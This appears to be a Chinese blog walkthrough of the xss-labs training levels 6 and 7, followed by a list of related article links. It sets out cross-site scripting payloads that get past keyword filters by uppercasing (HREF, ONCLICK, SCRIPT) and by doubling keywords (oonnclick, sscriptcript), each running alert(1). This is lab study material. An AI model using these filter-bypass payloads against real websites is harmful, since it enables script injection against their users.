5、xss-labs之level6

一、level6-----大小写绕过

1、测试分析

测试了之前用过的payload,发现都不行,并且level4使用的Java伪协议也不行,可以得出<>、script、onclick都被过滤

2、构造payload

因为href被过滤,可以试一下大写HREF

初试payload:

"><a HREF=javascript:alert(1)>xss<a/>//

既然可以大写绕过,那payload就多了,只要能够将value或者input标签闭合并且大写就都可以

"><a HREF=javascript:alert(1)>超链接,并弹窗</a>//

"ONCLICK=alert(1)//

"ONCLICK="alert(1)

"><SCRIPT>alert(1)</SCRIPT>//

二、level7-----双写绕过

1、测试分析

测试过的额payload有:

"οnclick=alert(1)//

"οnclick="alert(1)

"><script>alert(1)</script>//

"><a href=javascript:alert(1)>超链接,并弹窗</a>//

传入payload后,查看源码发现,过滤的有

on

script

href

大小写

2、构造payload

可以采用双写绕过,payload:

"oonnclick=alert(1)//

"oonnclick="alert(1)

"><sscriptcript>alert(1)</sscriptcript>//

"><a hhrefref=javasscriptcript:alert(1)>超链接,并弹窗</a>//

总结:

1、绕过方法还可以使用大写绕过

2、将input标签或者value其中一个闭合就可以尝试插入xss

3、双写可以绕过过滤

相关推荐
程序员码歌5 分钟前
OpenSpec 到 Superpowers:AI 编码从说清到做对
android·前端·人工智能
Scott9999HH5 分钟前
高端胶原蛋白饮多品牌深度对比:抗皱机理、国际研发标准、气色维度,一套可直接用的选品框架
安全
爱编程的小新☆6 分钟前
LangGraph4j工作流框架
前端·数据库·ai·langchain·langgraph4j
2501_9151063212 分钟前
深入解析无源码iOS加固原理与方案,保护应用安全
android·安全·ios·小程序·uni-app·cocoa·iphone
@PHARAOH22 分钟前
HOW - 构建一个轻量前后端一体服务
前端·微服务·服务端
无限进步_33 分钟前
【C++】C++11的类功能增强与STL变化
java·前端·数据结构·c++·后端·算法
一只小小Java34 分钟前
Echarts单表多图实现
前端·javascript·echarts
一拳一个娘娘腔39 分钟前
【SRC漏洞挖掘系列】第04期:文件上传与解析——把图片变成“特洛伊木马”
安全·web安全
探索者0140 分钟前
SQL注入深度解析笔记:从DNSlog外带到高级绕过技术
web安全·sql注入
宋浮檀s43 分钟前
SQL注入基础+DVWA搭建
数据库·sql·安全·网络安全